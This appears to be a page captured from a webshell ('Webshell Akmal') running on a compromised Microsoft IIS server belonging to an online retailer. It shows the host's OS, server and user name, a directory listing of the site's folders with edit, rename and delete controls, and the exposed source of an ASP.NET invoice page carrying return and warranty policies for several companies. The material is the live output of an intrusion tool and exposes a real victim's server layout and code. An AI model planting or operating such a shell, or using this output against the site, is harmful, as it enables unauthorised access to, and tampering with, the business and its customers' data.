Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="invoice.aspx.cs" Inherits="App.prog.invoice" %> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head runat="server"> <title></title> <style type="text/css"> body { font-family: "Times New Roman" , Times, serif; } .style19 { width: 374px; } .style20 { width: 149px; } .style22 { font-size:medium; font-family: "Times New Roman" , Times, serif; } .style24 { font-size:xx-large; font-family: "Times New Roman" , Times, serif; } .style25 { width: 1887px; } .style26 { width: 148px; text-align: right; } #WebBrowser { width: 0px; height: 6px; } .style27 { text-align: right; } .style28 { width: 174px; text-align: right; } .style29 { width: 157px; } .style30 { width: 241px; } .style31 { width: 138px; } .style32 { width: 259px; } </style> <script language="javascript" type="text/javascript"> function doPrint() { bdhtml = window.document.body.innerHTML; sprnstr = "<!--startprint-->"; eprnstr = "<!--endprint-->"; prnhtml = bdhtml.substr(bdhtml.indexOf(sprnstr) + 17); prnhtml = prnhtml.substring(0, prnhtml.indexOf(eprnstr)); window.document.body.innerHTML = prnhtml; window.print(); } function doEmail() { var bdhtml = window.document.body.innerHTML; sprnstr = "<!--startprint-->"; eprnstr = "<!--endprint-->"; var prnhtml = bdhtml.substr(bdhtml.indexOf(sprnstr) + 17); prnhtml = prnhtml.substring(0, prnhtml.indexOf(eprnstr)); document.getElementById("emailtext").value = prnhtml; } function doEmail1() { var bdhtml = window.document.body.innerHTML; sprnstr = "<!--startprint-->"; eprnstr = "<!--endprint-->"; var prnhtml = bdhtml.substr(bdhtml.indexOf(sprnstr) + 17); prnhtml = prnhtml.substring(0, prnhtml.indexOf(eprnstr)); document.getElementById("emailtext1").value = prnhtml; } </script> </head> <body style="width: 800px; margin:0 auto;"> <!--startprint--> <form id="form1" runat="server"> <div id="dispDiv"> <table width="800" border="0" align="center" cellpadding="5" cellspacing="0" style="border-collapse: collapse"> <tr> <td width="374" align="left"> <p> <strong> <%=orgname %></strong> <%=states %> <%=lxfs %> <%=sh %> </p> </td> <td width="374" align="center"> <strong><%=taitou %> No.<%=invoiceNo %></strong> </td> </tr> </table> <table width="800" border="0" align="center" cellpadding="5" cellspacing="0"> <tr> <td style="width: 800px; font-size: xx-large" align="center"> <div style="text-align:center; height:30px"> <div style="width: 350px; height: 10px;text-align:center; font-size: xx-small; float: left; background-color:Black"> </div> <div style="float: left; width: 140px"> <%=taitou %></div> <div style="width: 300px; height: 10px;text-align:center; font-size: xx-small; float: left;background-color:Black" > </div> </div> </td> </tr> </table> <table width="800" border="1" align="center" cellpadding="5" cellspacing="0" style="border-collapse: collapse"> <tr> <td class="style19"> <strong>Bill To</strong> </td> <td class="style19"> <strong>Ship To</strong> </td> </tr> <tr> <td class="style19"> <p> <%=bname %><br /> <%=bstreet %><br /> <%=lb3 %><br /> <%=bcountry %></p> </td> <td class="style19"> <p> <%=fullName %><br /> <%=lb2 %><br /> <%=lb1 %><br /> <%=country %></p> </td> </tr> </table> <table width="800" border="1" align="center" cellpadding="5" cellspacing="0"> <tr> <td> Date:<%=orderdt %> </td> <td> Order#:<%=saBillno %> </td> <td> Sales Person:<%=orderName %> </td> <td class="style20"> Terms:<%=terms %> </td> </tr> </table> <table width="800" border="1" align="center" cellpadding="5" cellspacing="0" style="border-collapse:collapse"> <tr> <td style="width: 287px"> Shipped By:<%=transName %> </td> <td> Ship Date:<%=shipTime %> </td> <td> Tracking#:<%=shipNumber %> </td> </tr> </table> <table width="800" border="0" align="center" cellpadding="5" cellspacing="0"> <tr> <td width="100%"> <asp:GridView ID="GridView1" runat="server" AutoGenerateColumns="False" EnableModelValidation="True" Width="795px" GridLines="Horizontal"> <Columns> <asp:BoundField DataField="quantity" HeaderText="QTY" ItemStyle-HorizontalAlign="Center" /> <asp:BoundField DataField="prdcode10" HeaderText="Item ID" ItemStyle-HorizontalAlign="Center"/> <asp:BoundField DataField="prdname10" HeaderText="Description" /> <asp:BoundField DataField="newprice" HeaderText="UnitPrice" ItemStyle-HorizontalAlign="Center" /> <asp:BoundField DataField="total" HeaderText="Total" ItemStyle-HorizontalAlign="Center" ><ItemStyle Width="150px" /> </asp:BoundField> </Columns> </asp:GridView> </td> </tr> </table> <table width="800" border="1" align="center" cellpadding="5" cellspacing="0"> <tr> <td height="12" align="center" class="style25"> <strong></strong> <%=notes %> </td> <td class="style28" style= "border-right:medium none;"> <p class="style27"> SubTotal:<br /> Discount:<br /> Shipping:<br /> HST:<br /> Total:</p> </td> <td class="style26" > <%=subTatol %><br /> <%=disCount %><br /> <%=shipcost %><br /> <%=taxcost %><br /> <%=totalamt %> </td> </tr> </table> <p style="page-break-after: always;"> </p> <!--endprint--> <!--分页--> <table width="800" border="0" align="center" cellpadding="0" cellspacing="0" style="border-collapse: collapse"> <tr> <%switch (orgname) { case "ASC365 International Ltd.":%> <td class="style30" style=" border-left-style:none; border-right-style:none; border-top-style:none; border-bottom-style:none"> <p align="center" class="style24"> <%=orgname %> Return and Refund Policy</p> <p> <strong style="font-size: large; font-family: 'Times New Roman', Times, serif">Return & Refund & Restocking Policies</strong></p> <span class="style22">ASC365 offers a 14 days return and refund for most merchandise. We do our best to make 100% satisfaction to our customers. If you are not satisfied with your purchase order from us within 14 days when you received, you must contact us at (647)350-2889 or customerservice@asc365.com for a Return Authorization (RA). Any returns without RA will not be processed and will be rejected. All the merchandise considered for refund must be returned in as-new, unopened condition and comes with original package. All refunds are for the original invoiced purchase price of the merchandise only. Any merchandise returned via post or courier must be shipped pre-paid and only to the location from it was originally shipped. Please note that shipping costs will not be refunded unless it is determined that the return is a result of an error by ASC365. <strong><%=rbili %></strong> minimum restore fee will be charged for most return items, and ASC365 reserves the right to change the rate depending on the return item’s condition and value. (For example, hot stamping machine 20% restocking fee charge, laser engraving machine 35% restocking fee charge.) Once the return item is received and processed at our Canada warehouse, we will issue a refund for the merchandise amount. Please allow up to one week for your return to be processed. </span> <br /> <p> <strong style="font-size: large; font-family: 'Times New Roman', Times, serif">Wrong Item </strong></p> <span class="style22">We will always make your order right. If you receive a wrong item, please contact us in 5 days after you get it. Some photos maybe required to help us to confirm. If the wrong item needs to be shipped back us due to our mistake, we will be responsible to pay all the postage. We will create a return label and send to the customer, and we will reship the correct item after we make sure the courier has picked up the wrong one. </span> <br /> <p><strong style="font-family: 'Times New Roman', Times, serif; font-size: large">Damaged Item</strong></p> <span class="style22">The customer has responsibility to inspect the merchandise which you received at once. If you found something was damaged when delivery, please keep all the original packing and notify us in 3 days. We will discuss with the customer to make decision what we need to do. If we are not notified within 7 days of the shippers delivered date, customers order will be considered complete and no refunds or claims will be filed or given. </span> <br /> <p><strong style="font-family: 'Times New Roman', Times, serif; font-size: large">Non-Returnable items</strong></p> <span class="style22">ASC365 cannot accept any refund or exchange for any items marked “Clearance”, “Used” or “Demo”. These sales are final. We also cannot accept any refund or exchange for consumable items, regardless of condition. This includes, but may not be limited to: Ink, Ink System & Ink, Printer with Ink System & Ink, Chemistry, Transfer Paper, Cut Vinyl, Software & Template and custom booked order. </span> <br /> <p><strong style="font-size: large; font-family: 'Times New Roman', Times, serif">Warranty Policies</strong></p> <span class="style22">ASC365 offers <strong><%=baoxiu %></strong> warranty for all the ASC365 machines. It is free for the components and parts replacement within warranty time, but labor fee charge based on exact cost. Warranty is only for the original buyers. Warranty location is ASC365 International Ltd. Canada office. </span> <br /> Epson Printer offers manufacturer’s warranty. Epson has a 30-day return policy from date of purchase. You may call the Epson Store at 1-800-444-1527 and speak to a return representative.</p> </td> <% break; case "EEZGLOBAL INC.":%> <td class="style32"> <p align="center" class="style24"> <%=orgname %> Return and Refund Policy</p> <p> <strong style="font-size: large; font-family: 'Times New Roman', Times, serif">Return & Refund & Restocking Policies</strong></p> <span class="style22">EEZGLOBAL offers a 14 days return and refund for most merchandise. We do our best to make 100% satisfaction to our customers. If you are not satisfied with your purchase order from us within 14 days when you received, you must contact us at (510)266-0876 or SERVICE@EEZGLOBAL.COM for a Return Authorization (RA). Any returns without RA will not be processed and will be rejected. All the merchandise considered for refund must be returned in as-new, unopened condition and comes with original package. All refunds are for the original invoiced purchase price of the merchandise only. Any merchandise returned via post or courier must be shipped pre-paid and only to the location from it was originally shipped. Please note that shipping costs will not be refunded unless it is determined that the return is a result of an error by EEZGLOBAL.<strong><%=rbili %></strong> minimum restore fee will be charged for most return items, and EEZGLOBAL reserves the right to change the rate depending on the return item’s condition and value. (For example, hot stamping machine 20% restocking fee charge, laser engraving machine 35% restocking fee charge.) Once the return item is received and processed at our warehouse, we will issue a refund for the merchandise amount. Please allow up to one week for your return to be processed. </span> <br /> <p> <strong style="font-size: large; font-family: 'Times New Roman', Times, serif">Wrong Item </strong></p> <br /> <span class="style22">We will always make your order right. If you receive a wrong item, please contact us in 5 days after you get it. Some photos maybe required to help us to confirm. If the wrong item needs to be shipped back us due to our mistake, we will be responsible to pay all the postage. We will create a return label and send to the customer, and we will reship the correct item after we make sure the courier has picked up the wrong one. </span> <br /> <p><strong style="font-family: 'Times New Roman', Times, serif; font-size: large">Damaged Item</strong></p> <span class="style22">The customer has responsibility to inspect the merchandise which you received at once. If you found something was damaged when delivery, please keep all the original packing and notify us in 3 days. We will discuss with the customer to make decision what we need to do. If we are not notified within 7 days of the shippers delivered date, customers order will be considered complete and no refunds or claims will be filed or given. </span> <br /> <p><strong style="font-family: 'Times New Roman', Times, serif; font-size: large">Non-Returnable items</strong></p> <span class="style22"> EEZGLOBAL cannot accept any refund or exchange for any items marked “Clearance”, “Used” or “Demo”. These sales are final. We also cannot accept any refund or exchange for consumable items, regardless of condition. This includes, but may not be limited to: Ink, Ink System & Ink, Printer with Ink System & Ink, Chemistry, Transfer Paper, Cut Vinyl, Software & Template and custom booked order. </span> <br /> <p><strong style="font-size: large; font-family: 'Times New Roman', Times, serif">Warranty Policies</strong></p> <span class="style22"> EEZGLOBAL offers <strong><%=baoxiu %></strong> warranty for all the EEZGLOBAL machines. It is free for the components and parts replacement within warranty time, but labor fee charge based on exact cost. Warranty is only for the original buyers. Warranty location is EEZGLOBAL INC. Hayward, CA 94545. </span> <br /> Epson Printer offers manufacturer’s warranty. Epson has a 30-day return policy from date of purchase. You may call the Epson Store at 1-800-444-1527 and speak to a return representative.</p> </td> <% break; case "TOPSELLER INC.":%> <td class="style31"> <p align="center" class="style24"> <%=orgname %> Return and Refund Policy</p> <p> <strong style="font-size: large; font-family: 'Times New Roman', Times, serif">Return & Refund & Restocking Policies</strong></p> <span class="style22">TOPSELLER offers a 14 days return and refund for most merchandise. We do our best to make 100% satisfaction to our customers. If you are not satisfied with your purchase order from us within 14 days when you received, you must contact us at (626)415-6138 or usa@asc365.com for a Return Authorization (RA). Any returns without RA will not be processed and will be rejected. All the merchandise considered for refund must be returned in as-new, unopened condition and comes with original package. All refunds are for the original invoiced purchase price of the merchandise only. Any merchandise returned via post or courier must be shipped pre-paid and only to the location from it was originally shipped. Please note that shipping costs will not be refunded unless it is determined that the return is a result of an error by TOPSELLER. <strong><%=rbili %></strong> minimum restore fee will be charged for most return items, and TOPSELLER reserves the right to change the rate depending on the return item’s condition and value. (For example, hot stamping machine 20% restocking fee charge, laser engraving machine 35% restocking fee charge.) Once the return item is received and processed at our warehouse, we will issue a refund for the merchandise amount. Please allow up to one week for your return to be processed. </span> <br /> <p> <strong style="font-size: large; font-family: 'Times New Roman', Times, serif">Wrong Item </strong></p> <br /> <span class="style22">We will always make your order right. If you receive a wrong item, please contact us in 5 days after you get it. Some photos maybe required to help us to confirm. If the wrong item needs to be shipped back us due to our mistake, we will be responsible to pay all the postage. We will create a return label and send to the customer, and we will reship the correct item after we make sure the courier has picked up the wrong one. </span> <br /> <p><strong style="font-family: 'Times New Roman', Times, serif; font-size: large">Damaged Item</strong></p> <span class="style22">The customer has responsibility to inspect the merchandise which you received at once. If you found something was damaged when delivery, please keep all the original packing and notify us in 3 days. We will discuss with the customer to make decision what we need to do. If we are not notified within 7 days of the shippers delivered date, customers order will be considered complete and no refunds or claims will be filed or given. </span> <br /> <p><strong style="font-family: 'Times New Roman', Times, serif; font-size: large">Non-Returnable items</strong></p> <span class="style22"> TOPSELLER cannot accept any refund or exchange for any items marked “Clearance”, “Used” or “Demo”. These sales are final. We also cannot accept any refund or exchange for consumable items, regardless of condition. This includes, but may not be limited to: Ink, Ink System & Ink, Printer with Ink System & Ink, Chemistry, Transfer Paper, Cut Vinyl, Software & Template and custom booked order. </span> <br /> <p><strong style="font-size: large; font-family: 'Times New Roman', Times, serif">Warranty Policies</strong></p> <span class="style22"> TOPSELLER offers <strong><%=baoxiu %></strong> warranty for all the TOPSELLER machines. It is free for the components and parts replacement within warranty time, but labor fee charge based on exact cost. Warranty is only for the original buyers. Warranty location is TOPSELLER INC. El Monte, CA 91731. </span> <br /> Epson Printer offers manufacturer’s warranty. Epson has a 30-day return policy from date of purchase. You may call the Epson Store at 1-800-444-1527 and speak to a return representative.</p> </td> <% break; case "ECOSS INC.":%> <td class="style29"> <p align="center" class="style24"> <%=orgname %> Return and Refund Policy</p> <p> <strong style="font-size: large; font-family: 'Times New Roman', Times, serif">Return & Refund & Restocking Policies</strong></p> <span class="style22">ECOSS offers a 14 days return and refund for most merchandise. We do our best to make 100% satisfaction to our customers. If you are not satisfied with your purchase order from us within 14 days when you received, you must contact us at (813)626-6668 or sales@ecossus.com for a Return Authorization (RA). Any returns without RA will not be processed and will be rejected. All the merchandise considered for refund must be returned in as-new, unopened condition and comes with original package. All refunds are for the original invoiced purchase price of the merchandise only. Any merchandise returned via post or courier must be shipped pre-paid and only to the location from it was originally shipped. Please note that shipping costs will not be refunded unless it is determined that the return is a result of an error by ECOSS. <strong><%=rbili %></strong> minimum restore fee will be charged for most return items, and ECOSS reserves the right to change the rate depending on the return item’s condition and value. (For example, hot stamping machine 20% restocking fee charge, laser engraving machine 35% restocking fee charge.) Once the return item is received and processed at our warehouse, we will issue a refund for the merchandise amount. Please allow up to one week for your return to be processed. </span> <br /> <p> <strong style="font-size: large; font-family: 'Times New Roman', Times, serif">Wrong Item </strong></p> <br /> <span class="style22">We will always make your order right. If you receive a wrong item, please contact us in 5 days after you get it. Some photos maybe required to help us to confirm. If the wrong item needs to be shipped back us due to our mistake, we will be responsible to pay all the postage. We will create a return label and send to the customer, and we will reship the correct item after we make sure the courier has picked up the wrong one. </span> <br /> <p><strong style="font-family: 'Times New Roman', Times, serif; font-size: large">Damaged Item</strong></p> <span class="style22">The customer has responsibility to inspect the merchandise which you received at once. If you found something was damaged when delivery, please keep all the original packing and notify us in 3 days. We will discuss with the customer to make decision what we need to do. If we are not notified within 7 days of the shippers delivered date, customers order will be considered complete and no refunds or claims will be filed or given. </span> <br /> <p><strong style="font-family: 'Times New Roman', Times, serif; font-size: large">Non-Returnable items</strong></p> <span class="style22"> ECOSS cannot accept any refund or exchange for any items marked “Clearance”, “Used” or “Demo”. These sales are final. We also cannot accept any refund or exchange for consumable items, regardless of condition. This includes, but may not be limited to: Ink, Ink System & Ink, Printer with Ink System & Ink, Chemistry, Transfer Paper, Cut Vinyl, Software & Template and custom booked order. </span> <br /> <p><strong style="font-size: large; font-family: 'Times New Roman', Times, serif">Warranty Policies</strong></p> <span class="style22"> ECOSS offers <strong><%=baoxiu %></strong> warranty for all the ECOSS machines. It is free for the components and parts replacement within warranty time, but labor fee charge based on exact cost. Warranty is only for the original buyers. Warranty location is ECOSS INC. Tampa FL 33610. </span> <br /> Epson Printer offers manufacturer’s warranty. Epson has a 30-day return policy from date of purchase. You may call the Epson Store at 1-800-444-1527 and speak to a return representative.</p> </td> <% break; default: break; } %> </tr> </table> </div> </form> </body> </html>